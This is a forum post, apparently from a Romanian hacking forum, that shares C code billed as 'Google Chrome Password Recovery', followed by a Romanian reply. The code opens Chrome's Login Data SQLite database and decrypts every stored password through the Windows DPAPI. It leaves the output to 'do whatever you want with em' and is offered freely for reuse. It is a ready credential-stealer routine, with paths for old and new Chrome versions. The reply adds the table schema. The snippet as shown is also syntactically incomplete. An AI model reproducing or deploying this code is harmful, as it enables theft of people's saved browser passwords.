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[C] Google Chrome Password Recovery

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[C] Google Chrome Password Recovery

Author: Sacrificial

* Google Chrome Password Recovery
* Coded by Sacrificial
* Sacrificial2010@hotmail.com

void GetGoogleChrome()
char szPath[MAX_PATH];
sqlite3 *lpDatabase;
sqlite3_stmt *lpStatement;
const char *lpTail;
char *szURL, *szUsername, *szPassword;
DATA_BLOB DataIn, DataOut;

SHGetSpecialFolderPath(0, szPath, 0x1C, 0);
strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Login Data");
if(GetFileAttributes(szPath) != 0xFFFFFFFF) {
sqlite3_open(szPath, &lpDatabase);
sqlite3_prepare_v2(lpDatabase, "SELECT * FROM logins", 20, &lpStatement, &lpTail);
do {
DataIn.pbData = (LPBYTE)sqlite3_column_blob(lpStatement, 5);
DataIn.cbData = sqlite3_column_bytes(lpStatement, 5);
if(CryptUnprotectData(&DataIn, 0, 0, 0, 0, 8, &DataOut)) {
szURL = (char*)sqlite3_column_text(lpStatement, 0);
szUsername = (char*)sqlite3_column_text(lpStatement, 3);
szPassword = (char*)DataOut.pbData;
szPassword[DataOut.cbData] = '\0';
// Do whatever you want with em;
} while(sqlite3_step(lpStatement) == SQLITE_ROW);


Its not the best coding, but it works, and like I said its old.

It requires the SQLite libraries.

For Chrome 6 and up the path is "\\Google\\Chrome\\User Data\\Default\\Login Data"

For Chrome 5 and below the path is "\\Google\\Chrome\\User Data\\Default\\Web Data"

Would be nice if you gave credits when using this code.


Sursa: [sNIPPET] Google Chrome Password Recovery

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Da, dar nu e tocmai genial sa iti dai seama ca e vorba de o baza de data SQLite. O poti deschide cu SQLite Explorer, sau nu stiu ce utilitar pentru astfel de baze de date si poti vedea structura, apoi "SELECT * FROM logins" si uite parolele. :)

Daca deschizi acel fisier "C:\Users\Ionut\AppData\Local\Google\Chrome\User Data\Default\Login Data" cu Notepad, primele caractere sunt: "SQLite format 3", apoi gasesti si: "CREATE TABLE logins (origin_url VARCHAR NOT NULL, action_url VARCHAR, username_element VARCHAR, username_value VARCHAR, password_element VARCHAR, password_value BLOB, submit_element VARCHAR, signon_realm VARCHAR NOT NULL,ssl_valid INTEGER NOT NULL,preferred INTEGER NOT NULL,date_created INTEGER NOT NULL,blacklisted_by_user INTEGER NOT NULL,scheme INTEGER NOT NULL,UNIQUE (origin_url, username_element, username_value, password_element, submit_element, signon_realm))" care spune tot ce iti trebuie.

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